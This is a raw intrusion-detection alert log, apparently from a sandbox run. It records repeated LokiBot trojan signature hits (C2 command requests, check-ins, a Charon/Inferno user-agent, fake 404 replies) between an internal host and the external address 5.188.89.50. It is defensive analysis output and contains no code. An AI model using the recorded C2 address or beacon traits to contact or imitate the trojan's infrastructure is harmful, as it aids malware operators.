                    09/28/21-06:51:22.613432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.999512TCP2025483ET TROJAN LokiBot Fake 404 Response80492425.188.89.50192.168.2.22
                    09/28/21-06:51:23.260701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.608755TCP2025483ET TROJAN LokiBot Fake 404 Response80492435.188.89.50192.168.2.22
                    09/28/21-06:51:23.883186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.225.188.89.50
                    09/28/21-06:51:23.883186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.225.188.89.50
                    09/28/21-06:51:23.883186TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.225.188.89.50
                    09/28/21-06:51:23.883186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.225.188.89.50
                    09/28/21-06:51:24.245244TCP2025483ET TROJAN LokiBot Fake 404 Response80492445.188.89.50192.168.2.22
                    09/28/21-06:51:24.517036TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.868451TCP2025483ET TROJAN LokiBot Fake 404 Response80492455.188.89.50192.168.2.22
                    09/28/21-06:51:25.124484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.488807TCP2025483ET TROJAN LokiBot Fake 404 Response80492465.188.89.50192.168.2.22
                    09/28/21-06:51:25.756368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.225.188.89.50
                    09/28/21-06:51:26.115351TCP2025483ET TROJAN LokiBot Fake 404 Response80492475.188.89.50192.168.2.22
                    09/28/21-06:51:26.383897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2025381ET TROJAN LokiBot Checkin4924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.801508TCP2025483ET TROJAN LokiBot Fake 404 Response80492485.188.89.50192.168.2.22
                    09/28/21-06:51:27.057486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2025381ET TROJAN LokiBot Checkin4924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.408521TCP2025483ET TROJAN LokiBot Fake 404 Response80492495.188.89.50192.168.2.22
                    09/28/21-06:51:27.673999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2025381ET TROJAN LokiBot Checkin4925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925080192.168.2.225.188.89.50
                    09/28/21-06:51:28.019418TCP2025483ET TROJAN LokiBot Fake 404 Response80492505.188.89.50192.168.2.22
                    09/28/21-06:51:28.260433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925180192.168.2.225.188.89.50
                    09/28/21-06:51:28.260433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925180192.168.2.225.188.89.50
                    09/28/21-06:51:28.260433TCP2025381ET TROJAN LokiBot Checkin4925180192.168.2.225.188.89.50
                    09/28/21-06:51:28.260433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925180192.168.2.225.188.89.50
                    09/28/21-06:51:28.604409TCP2025483ET TROJAN LokiBot Fake 404 Response80492515.188.89.50192.168.2.22
                    09/28/21-06:51:28.882332TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925280192.168.2.225.188.89.50
                    09/28/21-06:51:28.882332TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925280192.168.2.225.188.89.50
                    09/28/21-06:51:28.882332TCP2025381ET TROJAN LokiBot Checkin4925280192.168.2.225.188.89.50
                    09/28/21-06:51:28.882332TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925280192.168.2.225.188.89.50
                    09/28/21-06:51:29.232880TCP2025483ET TROJAN LokiBot Fake 404 Response80492525.188.89.50192.168.2.22
                    09/28/21-06:51:29.484912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925380192.168.2.225.188.89.50
                    09/28/21-06:51:29.484912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925380192.168.2.225.188.89.50
                    09/28/21-06:51:29.484912TCP2025381ET TROJAN LokiBot Checkin4925380192.168.2.225.188.89.50
                    09/28/21-06:51:29.484912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925380192.168.2.225.188.89.50
                    09/28/21-06:51:29.838618TCP2025483ET TROJAN LokiBot Fake 404 Response80492535.188.89.50192.168.2.22
                    09/28/21-06:51:30.105086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925480192.168.2.225.188.89.50
                    09/28/21-06:51:30.105086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925480192.168.2.225.188.89.50
                    09/28/21-06:51:30.105086TCP2025381ET TROJAN LokiBot Checkin4925480192.168.2.225.188.89.50
                    09/28/21-06:51:30.105086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925480192.168.2.225.188.89.50
                    09/28/21-06:51:30.459973TCP2025483ET TROJAN LokiBot Fake 404 Response80492545.188.89.50192.168.2.22
                    09/28/21-06:51:30.722784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925580192.168.2.225.188.89.50
                    09/28/21-06:51:30.722784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925580192.168.2.225.188.89.50
                    09/28/21-06:51:30.722784TCP2025381ET TROJAN LokiBot Checkin4925580192.168.2.225.188.89.50
                    09/28/21-06:51:30.722784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925580192.168.2.225.188.89.50
                    09/28/21-06:51:31.087202TCP2025483ET TROJAN LokiBot Fake 404 Response80492555.188.89.50192.168.2.22
                    09/28/21-06:51:31.353110TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925680192.168.2.225.188.89.50
                    09/28/21-06:51:31.353110TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925680192.168.2.225.188.89.50
                    09/28/21-06:51:31.353110TCP2025381ET TROJAN LokiBot Checkin4925680192.168.2.225.188.89.50
                    09/28/21-06:51:31.353110TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925680192.168.2.225.188.89.50
                    09/28/21-06:51:31.712104TCP2025483ET TROJAN LokiBot Fake 404 Response80492565.188.89.50192.168.2.22
                    09/28/21-06:51:31.987027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925780192.168.2.225.188.89.50
                    09/28/21-06:51:31.987027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925780192.168.2.225.188.89.50
                    09/28/21-06:51:31.987027TCP2025381ET TROJAN LokiBot Checkin4925780192.168.2.225.188.89.50
                    09/28/21-06:51:31.987027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925780192.168.2.225.188.89.50
                    09/28/21-06:51:32.343318TCP2025483ET TROJAN LokiBot Fake 404 Response80492575.188.89.50192.168.2.22
                    09/28/21-06:51:32.641426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925880192.168.2.225.188.89.50
                    09/28/21-06:51:32.641426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925880192.168.2.225.188.89.50
                    09/28/21-06:51:32.641426TCP2025381ET TROJAN LokiBot Checkin4925880192.168.2.225.188.89.50
                    09/28/21-06:51:32.641426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925880192.168.2.225.188.89.50
                    09/28/21-06:51:32.997788TCP2025483ET TROJAN LokiBot Fake 404 Response80492585.188.89.50192.168.2.22
                    09/28/21-06:51:33.247393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925980192.168.2.225.188.89.50
                    09/28/21-06:51:33.247393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925980192.168.2.225.188.89.50
                    09/28/21-06:51:33.247393TCP2025381ET TROJAN LokiBot Checkin4925980192.168.2.225.188.89.50
                    09/28/21-06:51:33.247393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925980192.168.2.225.188.89.50
                    09/28/21-06:51:33.614152TCP2025483ET TROJAN LokiBot Fake 404 Response80492595.188.89.50192.168.2.22
                    09/28/21-06:51:33.897538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926080192.168.2.225.188.89.50
                    09/28/21-06:51:33.897538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926080192.168.2.225.188.89.50
                    09/28/21-06:51:33.897538TCP2025381ET TROJAN LokiBot Checkin4926080192.168.2.225.188.89.50
                    09/28/21-06:51:33.897538TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926080192.168.2.225.188.89.50
                    09/28/21-06:51:34.259139TCP2025483ET TROJAN LokiBot Fake 404 Response80492605.188.89.50192.168.2.22
                    09/28/21-06:51:34.520465TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926180192.168.2.225.188.89.50
                    09/28/21-06:51:34.520465TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926180192.168.2.225.188.89.50
                    09/28/21-06:51:34.520465TCP2025381ET TROJAN LokiBot Checkin4926180192.168.2.225.188.89.50
                    09/28/21-06:51:34.520465TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926180192.168.2.225.188.89.50
                    09/28/21-06:51:34.880407TCP2025483ET TROJAN LokiBot Fake 404 Response80492615.188.89.50192.168.2.22
                    09/28/21-06:51:35.158359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926280192.168.2.225.188.89.50
                    09/28/21-06:51:35.158359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926280192.168.2.225.188.89.50
                    09/28/21-06:51:35.158359TCP2025381ET TROJAN LokiBot Checkin4926280192.168.2.225.188.89.50
                    09/28/21-06:51:35.158359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926280192.168.2.225.188.89.50
                    09/28/21-06:51:35.502118TCP2025483ET TROJAN LokiBot Fake 404 Response80492625.188.89.50192.168.2.22
                    09/28/21-06:51:35.771485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926380192.168.2.225.188.89.50
                    09/28/21-06:51:35.771485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926380192.168.2.225.188.89.50
                    09/28/21-06:51:35.771485TCP2025381ET TROJAN LokiBot Checkin4926380192.168.2.225.188.89.50
                    09/28/21-06:51:35.771485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926380192.168.2.225.188.89.50
                    09/28/21-06:51:36.152520TCP2025483ET TROJAN LokiBot Fake 404 Response80492635.188.89.50192.168.2.22
                    09/28/21-06:51:36.416967TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926480192.168.2.225.188.89.50
                    09/28/21-06:51:36.416967TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926480192.168.2.225.188.89.50
                    09/28/21-06:51:36.416967TCP2025381ET TROJAN LokiBot Checkin4926480192.168.2.225.188.89.50
                    09/28/21-06:51:36.416967TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926480192.168.2.225.188.89.50
                    09/28/21-06:51:36.777894TCP2025483ET TROJAN LokiBot Fake 404 Response80492645.188.89.50192.168.2.22
                    09/28/21-06:51:37.050080TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926580192.168.2.225.188.89.50
                    09/28/21-06:51:37.050080TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926580192.168.2.225.188.89.50
                    09/28/21-06:51:37.050080TCP2025381ET TROJAN LokiBot Checkin4926580192.168.2.225.188.89.50
                    09/28/21-06:51:37.050080TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926580192.168.2.225.188.89.50
                    09/28/21-06:51:37.397901TCP2025483ET TROJAN LokiBot Fake 404 Response80492655.188.89.50192.168.2.22
                    09/28/21-06:51:37.662483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926680192.168.2.225.188.89.50
                    09/28/21-06:51:37.662483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926680192.168.2.225.188.89.50
                    09/28/21-06:51:37.662483TCP2025381ET TROJAN LokiBot Checkin4926680192.168.2.225.188.89.50
                    09/28/21-06:51:37.662483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926680192.168.2.225.188.89.50
                    09/28/21-06:51:38.023429TCP2025483ET TROJAN LokiBot Fake 404 Response80492665.188.89.50192.168.2.22
                    09/28/21-06:51:38.305464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926780192.168.2.225.188.89.50
                    09/28/21-06:51:38.305464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926780192.168.2.225.188.89.50
                    09/28/21-06:51:38.305464TCP2025381ET TROJAN LokiBot Checkin4926780192.168.2.225.188.89.50
                    09/28/21-06:51:38.305464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926780192.168.2.225.188.89.50
                    09/28/21-06:51:38.651947TCP2025483ET TROJAN LokiBot Fake 404 Response80492675.188.89.50192.168.2.22
                    09/28/21-06:51:38.916392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926880192.168.2.225.188.89.50
                    09/28/21-06:51:38.916392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926880192.168.2.225.188.89.50
                    09/28/21-06:51:38.916392TCP2025381ET TROJAN LokiBot Checkin4926880192.168.2.225.188.89.50
                    09/28/21-06:51:38.916392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926880192.168.2.225.188.89.50
                    09/28/21-06:51:39.290411TCP2025483ET TROJAN LokiBot Fake 404 Response80492685.188.89.50192.168.2.22
                    09/28/21-06:51:39.553833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926980192.168.2.225.188.89.50
                    09/28/21-06:51:39.553833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926980192.168.2.225.188.89.50
                    09/28/21-06:51:39.553833TCP2025381ET TROJAN LokiBot Checkin4926980192.168.2.225.188.89.50
                    09/28/21-06:51:39.553833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926980192.168.2.225.188.89.50
                    09/28/21-06:51:39.922492TCP2025483ET TROJAN LokiBot Fake 404 Response80492695.188.89.50192.168.2.22
                    09/28/21-06:51:40.503875TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927080192.168.2.225.188.89.50
                    09/28/21-06:51:40.503875TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927080192.168.2.225.188.89.50
                    09/28/21-06:51:40.503875TCP2025381ET TROJAN LokiBot Checkin4927080192.168.2.225.188.89.50
                    09/28/21-06:51:40.503875TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927080192.168.2.225.188.89.50
                    09/28/21-06:51:40.856189TCP2025483ET TROJAN LokiBot Fake 404 Response80492705.188.89.50192.168.2.22
                    09/28/21-06:51:41.115944TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927180192.168.2.225.188.89.50
                    09/28/21-06:51:41.115944TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927180192.168.2.225.188.89.50
                    09/28/21-06:51:41.115944TCP2025381ET TROJAN LokiBot Checkin4927180192.168.2.225.188.89.50
                    09/28/21-06:51:41.115944TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927180192.168.2.225.188.89.50
                    09/28/21-06:51:41.467151TCP2025483ET TROJAN LokiBot Fake 404 Response80492715.188.89.50192.168.2.22
                    09/28/21-06:51:41.724809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927280192.168.2.225.188.89.50
                    09/28/21-06:51:41.724809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927280192.168.2.225.188.89.50
                    09/28/21-06:51:41.724809TCP2025381ET TROJAN LokiBot Checkin4927280192.168.2.225.188.89.50
                    09/28/21-06:51:41.724809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927280192.168.2.225.188.89.50
                    09/28/21-06:51:42.107495TCP2025483ET TROJAN LokiBot Fake 404 Response80492725.188.89.50192.168.2.22
                    09/28/21-06:51:42.375557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927380192.168.2.225.188.89.50
                    09/28/21-06:51:42.375557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927380192.168.2.225.188.89.50
                    09/28/21-06:51:42.375557TCP2025381ET TROJAN LokiBot Checkin4927380192.168.2.225.188.89.50
                    09/28/21-06:51:42.375557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927380192.168.2.225.188.89.50
                    09/28/21-06:51:42.736668TCP2025483ET TROJAN LokiBot Fake 404 Response80492735.188.89.50192.168.2.22
                    09/28/21-06:51:42.995199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927480192.168.2.225.188.89.50
                    09/28/21-06:51:42.995199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927480192.168.2.225.188.89.50
                    09/28/21-06:51:42.995199TCP2025381ET TROJAN LokiBot Checkin4927480192.168.2.225.188.89.50
                    09/28/21-06:51:42.995199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927480192.168.2.225.188.89.50
                    09/28/21-06:51:43.355303TCP2025483ET TROJAN LokiBot Fake 404 Response80492745.188.89.50192.168.2.22
                    09/28/21-06:51:43.599920TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927580192.168.2.225.188.89.50
                    09/28/21-06:51:43.599920TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927580192.168.2.225.188.89.50
                    09/28/21-06:51:43.599920TCP2025381ET TROJAN LokiBot Checkin4927580192.168.2.225.188.89.50
                    09/28/21-06:51:43.599920TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927580192.168.2.225.188.89.50
                    09/28/21-06:51:43.963711TCP2025483ET TROJAN LokiBot Fake 404 Response80492755.188.89.50192.168.2.22
                    09/28/21-06:51:44.227576TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927680192.168.2.225.188.89.50
                    09/28/21-06:51:44.227576TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927680192.168.2.225.188.89.50
                    09/28/21-06:51:44.227576TCP2025381ET TROJAN LokiBot Checkin4927680192.168.2.225.188.89.50
                    09/28/21-06:51:44.227576TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927680192.168.2.225.188.89.50
                    09/28/21-06:51:44.594955TCP2025483ET TROJAN LokiBot Fake 404 Response80492765.188.89.50192.168.2.22
                    09/28/21-06:51:44.852769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927780192.168.2.225.188.89.50
                    09/28/21-06:51:44.852769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927780192.168.2.225.188.89.50
                    09/28/21-06:51:44.852769TCP2025381ET TROJAN LokiBot Checkin4927780192.168.2.225.188.89.50
                    09/28/21-06:51:44.852769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927780192.168.2.225.188.89.50
                    09/28/21-06:51:45.233310TCP2025483ET TROJAN LokiBot Fake 404 Response80492775.188.89.50192.168.2.22
                    09/28/21-06:51:45.497066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927880192.168.2.225.188.89.50
                    09/28/21-06:51:45.497066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927880192.168.2.225.188.89.50
                    09/28/21-06:51:45.497066TCP2025381ET TROJAN LokiBot Checkin4927880192.168.2.225.188.89.50
                    09/28/21-06:51:45.497066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927880192.168.2.225.188.89.50
                    09/28/21-06:51:45.847830TCP2025483ET TROJAN LokiBot Fake 404 Response80492785.188.89.50192.168.2.22
                    09/28/21-06:51:46.098823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927980192.168.2.225.188.89.50
                    09/28/21-06:51:46.098823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927980192.168.2.225.188.89.50
                    09/28/21-06:51:46.098823TCP2025381ET TROJAN LokiBot Checkin4927980192.168.2.225.188.89.50
                    09/28/21-06:51:46.098823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927980192.168.2.225.188.89.50
                    09/28/21-06:51:46.445577TCP2025483ET TROJAN LokiBot Fake 404 Response80492795.188.89.50192.168.2.22
                    09/28/21-06:51:46.731312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928080192.168.2.225.188.89.50
                    09/28/21-06:51:46.731312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928080192.168.2.225.188.89.50
                    09/28/21-06:51:46.731312TCP2025381ET TROJAN LokiBot Checkin4928080192.168.2.225.188.89.50
                    09/28/21-06:51:46.731312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928080192.168.2.225.188.89.50
                    09/28/21-06:51:47.075848TCP2025483ET TROJAN LokiBot Fake 404 Response80492805.188.89.50192.168.2.22
                    09/28/21-06:51:47.365121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928180192.168.2.225.188.89.50
                    09/28/21-06:51:47.365121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928180192.168.2.225.188.89.50
                    09/28/21-06:51:47.365121TCP2025381ET TROJAN LokiBot Checkin4928180192.168.2.225.188.89.50
                    09/28/21-06:51:47.365121TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928180192.168.2.225.188.89.50
                    09/28/21-06:51:47.719933TCP2025483ET TROJAN LokiBot Fake 404 Response80492815.188.89.50192.168.2.22
                    09/28/21-06:51:47.981726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928280192.168.2.225.188.89.50
                    09/28/21-06:51:47.981726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928280192.168.2.225.188.89.50
                    09/28/21-06:51:47.981726TCP2025381ET TROJAN LokiBot Checkin4928280192.168.2.225.188.89.50
                    09/28/21-06:51:47.981726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928280192.168.2.225.188.89.50
                    09/28/21-06:51:48.346430TCP2025483ET TROJAN LokiBot Fake 404 Response80492825.188.89.50192.168.2.22
                    09/28/21-06:51:48.617827TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928380192.168.2.225.188.89.50
                    09/28/21-06:51:48.617827TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928380192.168.2.225.188.89.50
                    09/28/21-06:51:48.617827TCP2025381ET TROJAN LokiBot Checkin4928380192.168.2.225.188.89.50
                    09/28/21-06:51:48.617827TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928380192.168.2.225.188.89.50
                    09/28/21-06:51:48.974655TCP2025483ET TROJAN LokiBot Fake 404 Response80492835.188.89.50192.168.2.22
                    09/28/21-06:51:49.261615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928480192.168.2.225.188.89.50
                    09/28/21-06:51:49.261615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928480192.168.2.225.188.89.50
                    09/28/21-06:51:49.261615TCP2025381ET TROJAN LokiBot Checkin4928480192.168.2.225.188.89.50
                    09/28/21-06:51:49.261615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928480192.168.2.225.188.89.50
                    09/28/21-06:51:49.615707TCP2025483ET TROJAN LokiBot Fake 404 Response80492845.188.89.50192.168.2.22
                    09/28/21-06:51:49.892301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928580192.168.2.225.188.89.50
                    09/28/21-06:51:49.892301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928580192.168.2.225.188.89.50
                    09/28/21-06:51:49.892301TCP2025381ET TROJAN LokiBot Checkin4928580192.168.2.225.188.89.50
                    09/28/21-06:51:49.892301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928580192.168.2.225.188.89.50
                    09/28/21-06:51:50.238603TCP2025483ET TROJAN LokiBot Fake 404 Response80492855.188.89.50192.168.2.22
                    09/28/21-06:51:50.514179TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928680192.168.2.225.188.89.50
                    09/28/21-06:51:50.514179TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928680192.168.2.225.188.89.50
                    09/28/21-06:51:50.514179TCP2025381ET TROJAN LokiBot Checkin4928680192.168.2.225.188.89.50
                    09/28/21-06:51:50.514179TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928680192.168.2.225.188.89.50
                    09/28/21-06:51:50.888614TCP2025483ET TROJAN LokiBot Fake 404 Response80492865.188.89.50192.168.2.22
                    09/28/21-06:51:51.179561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928780192.168.2.225.188.89.50
                    09/28/21-06:51:51.179561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928780192.168.2.225.188.89.50
                    09/28/21-06:51:51.179561TCP2025381ET TROJAN LokiBot Checkin4928780192.168.2.225.188.89.50
                    09/28/21-06:51:51.179561TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928780192.168.2.225.188.89.50
                    09/28/21-06:51:51.573348TCP2025483ET TROJAN LokiBot Fake 404 Response80492875.188.89.50192.168.2.22
                    09/28/21-06:51:51.856519TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928880192.168.2.225.188.89.50
                    09/28/21-06:51:51.856519TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928880192.168.2.225.188.89.50
                    09/28/21-06:51:51.856519TCP2025381ET TROJAN LokiBot Checkin4928880192.168.2.225.188.89.50
                    09/28/21-06:51:51.856519TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928880192.168.2.225.188.89.50
                    09/28/21-06:51:52.219077TCP2025483ET TROJAN LokiBot Fake 404 Response80492885.188.89.50192.168.2.22
                    09/28/21-06:51:52.480075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928980192.168.2.225.188.89.50
                    09/28/21-06:51:52.480075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928980192.168.2.225.188.89.50
                    09/28/21-06:51:52.480075TCP2025381ET TROJAN LokiBot Checkin4928980192.168.2.225.188.89.50
                    09/28/21-06:51:52.480075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928980192.168.2.225.188.89.50
                    09/28/21-06:51:52.847076TCP2025483ET TROJAN LokiBot Fake 404 Response80492895.188.89.50192.168.2.22
                    09/28/21-06:51:53.107025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929080192.168.2.225.188.89.50
                    09/28/21-06:51:53.107025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929080192.168.2.225.188.89.50
                    09/28/21-06:51:53.107025TCP2025381ET TROJAN LokiBot Checkin4929080192.168.2.225.188.89.50
